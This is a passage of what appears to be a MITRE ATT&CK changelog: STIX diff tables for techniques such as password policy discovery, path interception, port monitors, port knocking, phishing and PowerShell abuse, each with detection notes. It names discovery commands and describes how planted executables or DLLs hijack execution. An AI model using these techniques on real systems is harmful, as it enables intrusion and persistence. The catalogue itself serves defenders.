| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-07-26 14:11:39.499000+00:00 | 2022-09-06 22:01:45.067000+00:00 |
| description | Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies).
Password policies can be discovered in cloud environments using available APIs such as GetAccountPasswordPolicy in AWS (Citation: AWS GetPasswordPolicy). |
Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
Password policies can be set and discovered on Windows, Linux, and macOS systems via various command shell utilities such as net accounts (/domain), Get-ADDefaultDomainPasswordPolicy, chage -l , cat /etc/pam.d/common-password, and pwpolicy getaccountpolicies (Citation: Superuser Linux Password Policies) (Citation: Jamf User Password Policies). Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to discover password policy information (e.g. show aaa, show aaa common-criteria policy all).(Citation: US-CERT-TA18-106A)
Password policies can be discovered in cloud environments using available APIs such as GetAccountPasswordPolicy in AWS (Citation: AWS GetPasswordPolicy). |
| external_references[1]['source_name'] | Superuser Linux Password Policies | AWS GetPasswordPolicy |
| external_references[1]['description'] | Matutiae, M. (2014, August 6). How to display password policy information for a user (Ubuntu)?. Retrieved April 5, 2018. | Amazon Web Services. (n.d.). AWS API GetAccountPasswordPolicy. Retrieved June 8, 2021. |
| external_references[1]['url'] | https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu | https://docs.aws.amazon.com/IAM/latest/APIReference/API_GetAccountPasswordPolicy.html |
| external_references[3]['source_name'] | AWS GetPasswordPolicy | Superuser Linux Password Policies |
| external_references[3]['description'] | Amazon Web Services. (n.d.). AWS API GetAccountPasswordPolicy. Retrieved June 8, 2021. | Matutiae, M. (2014, August 6). How to display password policy information for a user (Ubuntu)?. Retrieved April 5, 2018. |
| external_references[3]['url'] | https://docs.aws.amazon.com/IAM/latest/APIReference/API_GetAccountPasswordPolicy.html | https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu |
| x_mitre_contributors[1] | Isif Ibrahima | Sudhanshu Chauhan, @Sudhanshu_C |
| x_mitre_contributors[2] | Sudhanshu Chauhan, @Sudhanshu_C | Isif Ibrahima, Mandiant |
| x_mitre_version | 1.3 | 1.5 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'US-CERT-TA18-106A', 'description': 'US-CERT. (2018, April 20). Alert (TA18-106A) Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices. Retrieved October 19, 2020.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA18-106A'} | |
| x_mitre_contributors | Austin Clark, @c2defense | |
| x_mitre_platforms | Network |
| Description |
|---|
Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.
The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, %SystemRoot%\system32 (e.g., C:\Windows\system32), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.
For example, if C:\example path precedes C:\Windows\system32 is in the PATH environment variable, a program that is named net.exe and placed in C:\example path will be called instead of the Windows system "net" when "net" is executed from the command-line. |
New Detections:
Dropped Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-09-16 16:56:34.583000+00:00 | 2022-05-05 04:08:56.402000+00:00 |
| x_mitre_data_sources[1] | File: File Modification | Process: Process Creation |
| x_mitre_data_sources[2] | Process: Process Creation | Windows Registry: Windows Registry Key Modification |
| x_mitre_defense_bypassed[0] | Application control | Application Control |
| Description |
|---|
Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., C:\unsafe path with space\program.exe vs. "C:\safe path with space\program.exe"). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is C:\program files\myapp.exe, an adversary may create a program at C:\program.exe that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)
This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 | |
| external_references | absolomb. (2018, January 26). Windows Privilege Escalation Guide. Retrieved August 10, 2018. | |
| external_references | CAPEC-38 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | CAPEC-38 | |
| external_references | absolomb. (2018, January 26). Windows Privilege Escalation Guide. Retrieved August 10, 2018. |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-09-17 19:05:23.755000+00:00 | 2022-10-18 20:51:38.118000+00:00 |
| external_references[1]['source_name'] | capec | Windows Privilege Escalation Guide |
| external_references[1]['url'] | https://capec.mitre.org/data/definitions/38.html | https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ |
| external_references[2]['source_name'] | Microsoft CurrentControlSet Services | Windows Unquoted Services |
| external_references[2]['description'] | Microsoft. (2017, April 20). HKLM\SYSTEM\CurrentControlSet\Services Registry Tree. Retrieved March 16, 2020. | HackHappy. (2018, April 23). Windows Privilege Escalation – Unquoted Services. Retrieved August 10, 2018. |
| external_references[2]['url'] | https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree | https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/ |
| external_references[4]['source_name'] | Windows Unquoted Services | Microsoft CurrentControlSet Services |
| external_references[4]['description'] | HackHappy. (2018, April 23). Windows Privilege Escalation – Unquoted Services. Retrieved August 10, 2018. | Microsoft. (2017, April 20). HKLM\SYSTEM\CurrentControlSet\Services Registry Tree. Retrieved March 16, 2020. |
| external_references[4]['url'] | https://securityboulevard.com/2018/04/windows-privilege-escalation-unquoted-services/ | https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree |
| external_references[5]['source_name'] | Windows Privilege Escalation Guide | capec |
| external_references[5]['url'] | https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/ | https://capec.mitre.org/data/definitions/38.html |
| Old Description | New Description |
|---|---|
| Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions. | Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.(Citation: Peripheral Discovery Linux)(Citation: Peripheral Discovery macOS) Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-26 17:42:03.337000+00:00 | 2022-03-11 18:39:11.763000+00:00 |
| description | Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions. | Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.(Citation: Peripheral Discovery Linux)(Citation: Peripheral Discovery macOS) Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions. |
| x_mitre_version | 1.2 | 1.3 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Peripheral Discovery Linux', 'description': 'Shahriar Shovon. (2018, March). List USB Devices Linux. Retrieved March 11, 2022.', 'url': 'https://linuxhint.com/list-usb-devices-linux/'} | |
| external_references | {'source_name': 'Peripheral Discovery macOS', 'description': 'SS64. (n.d.). system_profiler. Retrieved March 11, 2022.', 'url': 'https://ss64.com/osx/system_profiler.html'} | |
| x_mitre_data_sources | Process: Process Creation | |
| x_mitre_platforms | Linux |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation |
| Description |
|---|
| Adversaries may send phishing messages to gain access to victim systems. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass malware spam campaigns. Adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems. Phishing may also be conducted via third-party services, like social media platforms. Phishing may also involve social engineering techniques, such as posing as a trusted source. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-18 17:39:13.604000+00:00 | 2022-01-04 13:57:16.959000+00:00 |
| x_mitre_data_sources[1] | Application Log: Application Log Content | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[3] | Network Traffic: Network Traffic Content | Application Log: Application Log Content |
| Description |
|---|
| Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code. All forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns. Adversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Phishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-15 03:43:13.134000+00:00 | 2022-03-08 21:57:56.078000+00:00 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Network Traffic: Network Traffic Content |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Network Traffic: Network Traffic Content |
| Old Description | New Description |
|---|---|
| Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software. This technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system. The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. | Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software. This technique has been observed both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system. The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-10-21 01:26:31.804000+00:00 | 2022-03-11 18:31:23.996000+00:00 |
| description | Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software. This technique has been observed to both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system. The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. | Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software. This technique has been observed both for the dynamic opening of a listening port as well as the initiating of a connection to a listening server on a different system. The observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs. |
| Old Description | New Description |
|---|---|
Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors. The Registry key contains entries for the following: * Local Port * Standard TCP/IP Port * USB Monitor * WSD Port Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM. |
Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.(Citation: AddMonitor) This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.(Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors.
The Registry key contains entries for the following:
* Local Port
* Standard TCP/IP Port
* USB Monitor
* WSD Port
Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-01-24 19:46:27.750000+00:00 | 2022-04-20 16:36:31.835000+00:00 |
| description | Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors.
The Registry key contains entries for the following:
* Local Port
* Standard TCP/IP Port
* USB Monitor
* WSD Port
Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM. |
Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.(Citation: AddMonitor) This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.(Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors.
The Registry key contains entries for the following:
* Local Port
* Standard TCP/IP Port
* USB Monitor
* WSD Port
Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM. |
| external_references[1]['source_name'] | AddMonitor | Bloxham |
| external_references[1]['description'] | Microsoft. (n.d.). AddMonitor function. Retrieved November 12, 2014. | Bloxham, B. (n.d.). Getting Windows to Play with Itself [PowerPoint slides]. Retrieved November 12, 2014. |
| external_references[1]['url'] | http://msdn.microsoft.com/en-us/library/dd183341 | https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf |
| external_references[2]['source_name'] | Bloxham | AddMonitor |
| external_references[2]['description'] | Bloxham, B. (n.d.). Getting Windows to Play with Itself [PowerPoint slides]. Retrieved November 12, 2014. | Microsoft. (n.d.). AddMonitor function. Retrieved November 12, 2014. |
| external_references[2]['url'] | https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf | http://msdn.microsoft.com/en-us/library/dd183341 |
| x_mitre_detection | Monitor process API calls to AddMonitor.(Citation: AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal. New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious.
Monitor Registry writes to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors. Run the Autoruns utility, which checks for this Registry key as a persistence mechanism (Citation: TechNet Autoruns) |
Monitor process API calls to AddMonitor.(Citation: AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal. New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious.
Monitor Registry writes to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors. Run the Autoruns utility, which checks for this Registry key as a persistence mechanism.(Citation: TechNet Autoruns) |
| x_mitre_version | 1.0 | 1.1 |
| Old Description | New Description |
|---|---|
Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems). PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk. A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack) PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014) |
Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.
A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)
PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014) |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-05-28 14:56:23.748000+00:00 | 2022-04-19 20:25:48.646000+00:00 |
| description | Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.
A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)
PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014) |
Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk.
A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack)
PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014) |
| external_references[1]['source_name'] | TechNet PowerShell | Microsoft PSfromCsharp APR 2014 |
| external_references[1]['description'] | Microsoft. (n.d.). Windows PowerShell Scripting. Retrieved April 28, 2016. | Babinec, K. (2014, April 28). Executing PowerShell scripts from C#. Retrieved April 22, 2019. |
| external_references[1]['url'] | https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx | https://blogs.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/ |
| external_references[2]['source_name'] | Github PSAttack | SilentBreak Offensive PS Dec 2015 |
| external_references[2]['description'] | Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016. | Christensen, L.. (2015, December 28). The Evolution of Offensive PowerShell Invocation. Retrieved December 8, 2018. |
| external_references[2]['url'] | https://github.com/jaredhaight/PSAttack | https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/ |
| external_references[3]['source_name'] | Sixdub PowerPick Jan 2016 | FireEye PowerShell Logging 2016 |
| external_references[3]['description'] | Warner, J.. (2015, January 6). Inexorable PowerShell – A Red Teamer’s Tale of Overcoming Simple AppLocker Policies. Retrieved December 8, 2018. | Dunwoody, M. (2016, February 11). GREATER VISIBILITY THROUGH POWERSHELL LOGGING. Retrieved February 16, 2016. |
| external_references[3]['url'] | http://www.sixdub.net/?p=367 | https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html |
| external_references[4]['source_name'] | SilentBreak Offensive PS Dec 2015 | Github PSAttack |
| external_references[4]['description'] | Christensen, L.. (2015, December 28). The Evolution of Offensive PowerShell Invocation. Retrieved December 8, 2018. | Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016. |
| external_references[4]['url'] | https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/ | https://github.com/jaredhaight/PSAttack |
| external_references[5]['source_name'] | Microsoft PSfromCsharp APR 2014 | inv_ps_attacks |
| external_references[5]['description'] | Babinec, K. (2014, April 28). Executing PowerShell scripts from C#. Retrieved April 22, 2019. | Hastings, M. (2014, July 16). Investigating PowerShell Attacks. Retrieved December 1, 2021. |
| external_references[5]['url'] | https://blogs.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/ | https://powershellmagazine.com/2014/07/16/investigating-powershell-attacks/ |
| external_references[7]['source_name'] | FireEye PowerShell Logging 2016 | TechNet PowerShell |
| external_references[7]['description'] | Dunwoody, M. (2016, February 11). GREATER VISIBILITY THROUGH POWERSHELL LOGGING. Retrieved February 16, 2016. | Microsoft. (n.d.). Windows PowerShell Scripting. Retrieved April 28, 2016. |
| external_references[7]['url'] | https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html | https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx |
| x_mitre_data_sources[0] | Command: Command Execution | Script: Script Execution |
| x_mitre_data_sources[1] | Module: Module Load | Command: Command Execution |
| x_mitre_data_sources[2] | Process: Process Creation | Process: Process Metadata |
| x_mitre_data_sources[3] | Script: Script Execution | Process: Process Creation |
| x_mitre_detection | If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity. Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data. | If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity.
Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)
It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.
Consider monitoring for Windows event ID (EID) 400, which shows the version of PowerShell executing in the EngineVersion field (which may also be relevant to detecting a potential [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)) as well as if PowerShell is running locally or remotely in the HostName field. Furthermore, EID 400 may indicate the start time and EID 403 indicates the end time of a PowerShell session.(Citation: inv_ps_attacks) |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
